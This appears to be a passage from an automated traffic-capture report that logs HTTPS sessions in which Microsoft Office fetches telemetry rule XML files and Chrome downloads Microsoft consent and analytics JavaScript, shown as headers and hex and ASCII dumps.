                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-21 09:38:08 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:38:07 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 1391
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                                                                                        ETag: "0x8DC582BDF58DC7E"
                                                                                                                                                                        x-ms-request-id: 44a56bea-901e-0064-626a-3be8a6000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241121T093807Z-178bfbc474bwlrhlhC1NYCy3kg00000001a0000000005z7f
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-21 09:38:08 UTC1391INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        130192.168.2.64986113.107.246.60443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:38:08 UTC192OUTGET /rules/rule702800v1s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-21 09:38:08 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:38:08 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 1354
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                                                                                                                                        ETag: "0x8DC582BE0662D7C"
                                                                                                                                                                        x-ms-request-id: 119e228c-001e-0046-1663-3bda4b000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241121T093808Z-178bfbc474bfw4gbhC1NYCunf4000000018000000000asv6
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-21 09:38:08 UTC1354INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S="Medium" /> <F T="2"> <O


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        131192.168.2.64986213.107.246.454433392C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:38:08 UTC373OUTGET /mscc/lib/v2/wcp-consent.js HTTP/1.1
                                                                                                                                                                        Host: wcpstatic.microsoft.com
                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                        Accept: */*
                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                        2024-11-21 09:38:09 UTC712INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:38:08 GMT
                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                        Content-Length: 52717
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                        Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                        Age: 9154
                                                                                                                                                                        Cache-Control: max-age=43200
                                                                                                                                                                        Content-MD5: QT/MdZzBmCG2G2lBgIsptQ==
                                                                                                                                                                        Etag: 0x8DA85F6F74C6D08
                                                                                                                                                                        Last-Modified: Wed, 24 Aug 2022 17:34:58 GMT
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        X-Cache: CONFIG_NOCACHE
                                                                                                                                                                        x-ms-blob-type: BlockBlob
                                                                                                                                                                        x-ms-lease-status: unlocked
                                                                                                                                                                        x-ms-request-id: 09b6fa6f-101e-0038-42e3-3b8981000000
                                                                                                                                                                        x-ms-version: 2009-09-19
                                                                                                                                                                        x-azure-ref: 20241121T093808Z-178bfbc474bscnbchC1NYCe7eg00000001a000000000esef
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-21 09:38:09 UTC15672INData Raw: 76 61 72 20 57 63 70 43 6f 6e 73 65 6e 74 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 7b 32 32 39 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 77 69 6e 64 6f 77 2c 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 6f 28 6e 29 7b 69 66 28 74 5b 6e 5d 29 72 65 74 75 72 6e 20 74 5b 6e 5d 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 72 3d 74 5b 6e 5d 3d 7b 69 3a 6e 2c 6c 3a 21 31 2c 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 72 65 74 75 72 6e 20 65 5b 6e 5d 2e 63 61 6c 6c 28 72 2e 65 78 70 6f 72 74 73 2c 72 2c 72 2e 65 78 70 6f 72 74 73 2c 6f 29 2c 72 2e 6c 3d 21 30 2c 72 2e 65 78 70 6f 72 74 73 7d 72 65 74 75 72 6e 20 6f 2e 6d 3d 65 2c 6f 2e 63 3d 74 2c 6f 2e 64 3d 66 75 6e 63 74 69 6f 6e 28 65
                                                                                                                                                                        Data Ascii: var WcpConsent;!function(){var e={229:function(e){window,e.exports=function(e){var t={};function o(n){if(t[n])return t[n].exports;var r=t[n]={i:n,l:!1,exports:{}};return e[n].call(r.exports,r,r.exports,o),r.l=!0,r.exports}return o.m=e,o.c=t,o.d=function(e
                                                                                                                                                                        2024-11-21 09:38:09 UTC16384INData Raw: 7b 72 65 74 75 72 6e 20 65 3f 65 2e 72 65 70 6c 61 63 65 28 2f 26 2f 67 2c 22 26 61 6d 70 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 3c 2f 67 2c 22 26 6c 74 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 3e 2f 67 2c 22 26 67 74 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 22 2f 67 2c 22 26 71 75 6f 74 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 27 2f 67 2c 22 26 23 30 33 39 3b 22 29 3a 22 22 7d 2c 65 7d 28 29 2c 61 3d 6e 2e 6c 6f 63 61 6c 73 2c 6c 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 65 2c 74 2c 6f 2c 6e 2c 72 2c 69 2c 61 29 7b 74 68 69 73 2e 64 69 72 65 63 74 69 6f 6e 3d 22 6c 74 72 22 2c 74 68 69 73 2e 70 72 65 76 69 6f 75 73 46 6f 63 75 73 45 6c 65 6d 65 6e 74 42 65 66 6f 72 65 50 6f 70 75 70 3d 6e 75 6c 6c 2c 74 68 69 73 2e 63 6f 6f 6b 69 65
                                                                                                                                                                        Data Ascii: {return e?e.replace(/&/g,"&amp;").replace(/</g,"&lt;").replace(/>/g,"&gt;").replace(/"/g,"&quot;").replace(/'/g,"&#039;"):""},e}(),a=n.locals,l=function(){function e(e,t,o,n,r,i,a){this.direction="ltr",this.previousFocusElementBeforePopup=null,this.cookie
                                                                                                                                                                        2024-11-21 09:38:09 UTC16384INData Raw: 72 22 5d 2b 22 20 21 69 6d 70 6f 72 74 61 6e 74 3b 5c 6e 20 20 20 20 20 20 20 20 7d 22 2c 74 2b 3d 27 69 6e 70 75 74 5b 74 79 70 65 3d 22 72 61 64 69 6f 22 5d 2e 27 2b 63 2e 63 6f 6f 6b 69 65 49 74 65 6d 52 61 64 69 6f 42 74 6e 2b 22 20 2b 20 6c 61 62 65 6c 3a 68 6f 76 65 72 3a 3a 61 66 74 65 72 20 7b 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 22 2b 65 5b 22 72 61 64 69 6f 2d 62 75 74 74 6f 6e 2d 68 6f 76 65 72 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 22 5d 2b 22 20 21 69 6d 70 6f 72 74 61 6e 74 3b 5c 6e 20 20 20 20 20 20 20 20 7d 22 2c 74 2b 3d 27 69 6e 70 75 74 5b 74 79 70 65 3d 22 72 61 64 69 6f 22 5d 2e 27 2b 63 2e 63 6f 6f 6b 69 65 49 74 65 6d 52 61 64 69 6f 42 74 6e 2b 22 20 2b 20 6c 61
                                                                                                                                                                        Data Ascii: r"]+" !important;\n }",t+='input[type="radio"].'+c.cookieItemRadioBtn+" + label:hover::after {\n background-color: "+e["radio-button-hover-background-color"]+" !important;\n }",t+='input[type="radio"].'+c.cookieItemRadioBtn+" + la
                                                                                                                                                                        2024-11-21 09:38:09 UTC81INData Raw: 6d 65 6e 74 42 79 49 64 28 22 77 63 70 43 6f 6e 73 65 6e 74 42 61 6e 6e 65 72 43 74 72 6c 22 29 7d 2c 65 2e 65 6d 69 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 5b 5d 2c 6f 3d 31 3b 6f 3c 61 72 67 75 6d 65 6e 74 73
                                                                                                                                                                        Data Ascii: mentById("wcpConsentBannerCtrl")},e.emit=function(e){for(var t=[],o=1;o<arguments
                                                                                                                                                                        2024-11-21 09:38:09 UTC4196INData Raw: 2e 6c 65 6e 67 74 68 3b 6f 2b 2b 29 74 5b 6f 2d 31 5d 3d 61 72 67 75 6d 65 6e 74 73 5b 6f 5d 3b 76 61 72 20 6e 3d 74 68 69 73 2e 65 76 65 6e 74 73 5b 65 5d 3b 6e 26 26 6e 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 74 29 7d 29 29 7d 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6f 29 7b 65 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3f 65 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 74 2c 6f 29 3a 65 2e 61 74 74 61 63 68 45 76 65 6e 74 28 22 6f 6e 22 2b 74 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 6f 2e 63 61 6c 6c 28 65 29 7d 29 29 7d 2c 65 2e 63 6f 6f 6b 69 65 4e 61 6d 65 3d 22 4d 53 43 43 22 2c 65
                                                                                                                                                                        Data Ascii: .length;o++)t[o-1]=arguments[o];var n=this.events[e];n&&n.forEach((function(e){e.apply(null,t)}))},e.prototype.addEventListener=function(e,t,o){e.addEventListener?e.addEventListener(t,o):e.attachEvent("on"+t,(function(){o.call(e)}))},e.cookieName="MSCC",e


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        132192.168.2.64986613.107.246.454433392C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:38:09 UTC370OUTGET /scripts/c/ms.jsll-4.min.js HTTP/1.1
                                                                                                                                                                        Host: js.monitor.azure.com
                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                        Accept: */*
                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                        2024-11-21 09:38:09 UTC889INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:38:09 GMT
                                                                                                                                                                        Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                        Content-Length: 207935
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Cache-Control: no-transform, public, max-age=1800, immutable
                                                                                                                                                                        Last-Modified: Mon, 14 Oct 2024 17:27:31 GMT
                                                                                                                                                                        ETag: 0x8DCEC757C1AD1D1
                                                                                                                                                                        x-ms-request-id: 24663fe8-301e-00d3-0bb2-2cfca8000000
                                                                                                                                                                        x-ms-version: 2009-09-19
                                                                                                                                                                        x-ms-meta-jssdkver: 4.3.3
                                                                                                                                                                        x-ms-meta-jssdksrc: [cdn]/scripts/c/ms.jsll-4.3.3.min.js
                                                                                                                                                                        Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,x-ms-meta-jssdkver,x-ms-meta-jssdksrc,Content-Type,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                        x-azure-ref: 20241121T093809Z-1777c6cb7542p5p4hC1TEBq0980000000aw0000000009e6w
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-21 09:38:09 UTC15495INData Raw: 2f 2a 21 0a 20 2a 20 31 44 53 20 4a 53 4c 4c 20 53 4b 55 2c 20 34 2e 33 2e 33 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 4d 69 63 72 6f 73 6f 66 74 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 0a 20 2a 20 28 4d 69 63 72 6f 73 6f 66 74 20 49 6e 74 65 72 6e 61 6c 20 4f 6e 6c 79 29 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 75 6e 64 65 66 69 6e 65 64 22 3b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 21 3d 6e 29 74 28 65 78 70 6f 72 74 73 29 3b 65 6c 73 65 20 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69
                                                                                                                                                                        Data Ascii: /*! * 1DS JSLL SKU, 4.3.3 * Copyright (c) Microsoft and contributors. All rights reserved. * (Microsoft Internal Only) */!function(e,t){var n="undefined";if("object"==typeof exports&&typeof module!=n)t(exports);else if("function"==typeof define&&defi
                                                                                                                                                                        2024-11-21 09:38:09 UTC16384INData Raw: 28 69 29 3a 28 72 3d 66 65 28 22 63 6f 6e 73 6f 6c 65 22 29 29 26 26 28 72 2e 65 72 72 6f 72 7c 7c 72 2e 6c 6f 67 29 28 74 2c 63 65 28 69 29 29 29 29 7d 53 65 28 61 3d 7b 74 68 65 6e 3a 6f 2c 22 63 61 74 63 68 22 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6f 28 75 6e 64 65 66 69 6e 65 64 2c 65 29 7d 2c 22 66 69 6e 61 6c 6c 79 22 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 74 2c 6e 3d 74 3b 72 65 74 75 72 6e 20 51 28 74 29 26 26 28 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 26 26 74 28 29 2c 65 7d 2c 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 68 72 6f 77 20 74 26 26 74 28 29 2c 65 7d 29 2c 6f 28 65 2c 6e 29 7d 7d 2c 22 73 74 61 74 65 22 2c 7b 67 65 74 3a 64 7d 29 2c 68 74 28 29 26 26 28 61 5b 6d 74 28
                                                                                                                                                                        Data Ascii: (i):(r=fe("console"))&&(r.error||r.log)(t,ce(i))))}Se(a={then:o,"catch":function(e){return o(undefined,e)},"finally":function(t){var e=t,n=t;return Q(t)&&(e=function(e){return t&&t(),e},n=function(e){throw t&&t(),e}),o(e,n)}},"state",{get:d}),ht()&&(a[mt(
                                                                                                                                                                        2024-11-21 09:38:09 UTC16384INData Raw: 28 65 2c 74 2c 6e 2c 72 29 7b 67 65 28 65 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 26 26 65 5b 74 5d 26 26 28 6e 3f 28 6e 2e 63 62 5b 74 65 5d 28 7b 66 6e 3a 72 2c 61 72 67 3a 65 7d 29 2c 6e 2e 68 3d 6e 2e 68 7c 7c 6e 6e 28 70 63 2c 30 2c 6e 29 29 3a 4d 28 72 2c 5b 65 5d 29 29 7d 29 7d 68 63 2e 5f 5f 69 65 44 79 6e 3d 31 3b 76 61 72 20 76 63 3d 68 63 3b 66 75 6e 63 74 69 6f 6e 20 68 63 28 65 29 7b 74 68 69 73 2e 6c 69 73 74 65 6e 65 72 73 3d 5b 5d 3b 76 61 72 20 6e 2c 69 3d 5b 5d 2c 61 3d 7b 68 3a 6e 75 6c 6c 2c 63 62 3a 5b 5d 7d 2c 6f 3d 76 6f 28 65 2c 64 63 29 5b 4b 6e 5d 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6e 3d 21 21 65 2e 63 66 67 2e 70 65 72 66 45 76 74 73 53 65 6e 64 41 6c 6c 7d 29 3b 76 65 28 68 63 2c 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28
                                                                                                                                                                        Data Ascii: (e,t,n,r){ge(e,function(e){e&&e[t]&&(n?(n.cb[te]({fn:r,arg:e}),n.h=n.h||nn(pc,0,n)):M(r,[e]))})}hc.__ieDyn=1;var vc=hc;function hc(e){this.listeners=[];var n,i=[],a={h:null,cb:[]},o=vo(e,dc)[Kn](function(e){n=!!e.cfg.perfEvtsSendAll});ve(hc,this,function(
                                                                                                                                                                        2024-11-21 09:38:10 UTC16384INData Raw: 28 65 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 61 2e 66 6c 75 73 68 43 6f 6d 70 6c 65 74 65 3d 65 2c 50 3d 21 30 2c 52 2e 72 75 6e 28 6f 2c 61 29 2c 66 5b 67 72 5d 28 29 2c 6f 5b 6c 72 5d 28 61 29 7d 2c 36 2c 6e 29 2c 69 7d 2c 66 5b 6f 72 5d 3d 73 2c 66 2e 61 64 64 50 6c 75 67 69 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 2c 72 29 7b 69 66 28 21 65 29 72 65 74 75 72 6e 20 72 26 26 72 28 21 31 29 2c 76 6f 69 64 20 43 28 6f 75 29 3b 76 61 72 20 69 3d 73 28 65 5b 24 6e 5d 29 3b 69 66 28 69 26 26 21 74 29 72 65 74 75 72 6e 20 72 26 26 72 28 21 31 29 2c 76 6f 69 64 20 43 28 22 50 6c 75 67 69 6e 20 5b 22 2b 65 5b 24 6e 5d 2b 22 5d 20 69 73 20 61 6c 72 65 61 64 79 20 6c 6f 61 64 65 64 21 22 29 3b 76 61 72 20 61 2c 6f 3d 7b 72 65 61 73 6f 6e 3a 31 36 7d 3b 66
                                                                                                                                                                        Data Ascii: (e,function(e){a.flushComplete=e,P=!0,R.run(o,a),f[gr](),o[lr](a)},6,n),i},f[or]=s,f.addPlugin=function(e,t,n,r){if(!e)return r&&r(!1),void C(ou);var i=s(e[$n]);if(i&&!t)return r&&r(!1),void C("Plugin ["+e[$n]+"] is already loaded!");var a,o={reason:16};f
                                                                                                                                                                        2024-11-21 09:38:10 UTC16384INData Raw: 6c 3a 31 2c 43 72 69 74 69 63 61 6c 3a 32 7d 29 2c 75 6e 64 65 66 69 6e 65 64 2c 75 6e 64 65 66 69 6e 65 64 29 2c 53 6c 3d 22 22 3b 66 75 6e 63 74 69 6f 6e 20 78 6c 28 65 29 7b 74 72 79 7b 69 66 28 6f 65 28 6f 74 28 29 29 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 76 61 72 20 74 3d 28 6e 65 77 20 44 61 74 65 29 5b 4f 73 5d 28 29 2c 6e 3d 66 65 28 65 3d 3d 3d 45 6c 2e 4c 6f 63 61 6c 53 74 6f 72 61 67 65 3f 22 6c 6f 63 61 6c 53 74 6f 72 61 67 65 22 3a 22 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 22 29 2c 72 3d 53 6c 2b 74 2c 69 3d 28 6e 2e 73 65 74 49 74 65 6d 28 72 2c 74 29 2c 6e 2e 67 65 74 49 74 65 6d 28 72 29 21 3d 3d 74 29 3b 69 66 28 6e 5b 52 73 5d 28 72 29 2c 21 69 29 72 65 74 75 72 6e 20 6e 7d 63 61 74 63 68 28 61 29 7b 7d 72 65 74 75 72 6e 20 6e 75 6c
                                                                                                                                                                        Data Ascii: l:1,Critical:2}),undefined,undefined),Sl="";function xl(e){try{if(oe(ot()))return null;var t=(new Date)[Os](),n=fe(e===El.LocalStorage?"localStorage":"sessionStorage"),r=Sl+t,i=(n.setItem(r,t),n.getItem(r)!==t);if(n[Rs](r),!i)return n}catch(a){}return nul
                                                                                                                                                                        2024-11-21 09:38:10 UTC16384INData Raw: 6f 20 74 72 61 63 6b 20 70 61 67 65 20 76 69 73 69 74 20 74 69 6d 65 20 66 61 69 6c 65 64 2c 20 6d 65 74 72 69 63 20 77 69 6c 6c 20 6e 6f 74 20 62 65 20 63 6f 6c 6c 65 63 74 65 64 3a 20 22 2b 63 65 28 72 29 29 7d 7d 2c 59 28 65 2c 22 5f 6c 6f 67 67 65 72 22 2c 7b 67 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6f 7d 7d 29 2c 59 28 65 2c 22 70 61 67 65 56 69 73 69 74 54 69 6d 65 54 72 61 63 6b 69 6e 67 48 61 6e 64 6c 65 72 22 2c 7b 67 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 63 7d 7d 29 7d 29 7d 76 61 72 20 4e 64 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 74 68 69 73 5b 67 64 5d 3d 50 74 28 29 2c 74 68 69 73 2e 70 61 67 65 4e 61 6d 65 3d 65 2c 74 68 69 73 2e 70 61 67 65 55 72 6c 3d 74 7d 2c 44 64 3d 66 75 6e 63 74 69 6f 6e 28
                                                                                                                                                                        Data Ascii: o track page visit time failed, metric will not be collected: "+ce(r))}},Y(e,"_logger",{g:function(){return o}}),Y(e,"pageVisitTimeTrackingHandler",{g:function(){return c}})})}var Nd=function(e,t){this[gd]=Pt(),this.pageName=e,this.pageUrl=t},Dd=function(
                                                                                                                                                                        2024-11-21 09:38:10 UTC16384INData Raw: 63 6f 72 65 44 61 74 61 2c 22 62 65 68 61 76 69 6f 72 22 29 2c 75 65 28 6e 2e 70 61 67 65 54 79 70 65 29 26 26 28 65 2e 70 61 67 65 54 79 70 65 3d 6e 2e 70 61 67 65 54 79 70 65 29 2c 75 65 28 72 2e 5f 70 61 67 65 54 79 70 65 4d 65 74 61 54 61 67 29 26 26 21 75 65 28 65 2e 70 61 67 65 54 79 70 65 29 26 26 28 65 2e 70 61 67 65 54 79 70 65 3d 72 2e 5f 70 61 67 65 54 79 70 65 4d 65 74 61 54 61 67 29 2c 75 65 28 72 2e 5f 6d 61 72 6b 65 74 4d 65 74 61 54 61 67 29 26 26 28 65 2e 6d 61 72 6b 65 74 3d 72 2e 5f 6d 61 72 6b 65 74 4d 65 74 61 54 61 67 29 2c 65 2e 69 73 4c 6f 67 67 65 64 49 6e 3d 47 64 28 72 2e 5f 63 6f 6e 66 69 67 29 2c 74 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 3d 6f 63 28 29 7d 2c 69 70 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 73 65 74 50 61 67 65 54
                                                                                                                                                                        Data Ascii: coreData,"behavior"),ue(n.pageType)&&(e.pageType=n.pageType),ue(r._pageTypeMetaTag)&&!ue(e.pageType)&&(e.pageType=r._pageTypeMetaTag),ue(r._marketMetaTag)&&(e.market=r._marketMetaTag),e.isLoggedIn=Gd(r._config),t.cookieEnabled=oc()},ip.prototype._setPageT
                                                                                                                                                                        2024-11-21 09:38:10 UTC16384INData Raw: 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 2c 41 70 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 69 73 54 72 61 63 6b 65 64 57 69 74 68 44 61 74 61 42 69 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 65 2e 61 74 74 72 69 62 75 74 65 73 2c 6e 3d 30 3b 6e 3c 74 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 69 66 28 7e 74 5b 6e 5d 2e 6e 61 6d 65 2e 69 6e 64 65 78 4f 66 28 22 64 61 74 61 2d 62 69 2d 22 29 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 2c 41 70 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 69 73 54 72 61 63 6b 65 64 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 65 2e 61 74 74 72 69 62 75 74 65 73 2c 6e 3d 30 3b 6e 3c 74 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 69 66 28 22 64 61 74 61 2d 6d 22 3d 3d 3d 74 5b 6e 5d 2e 6e 61 6d
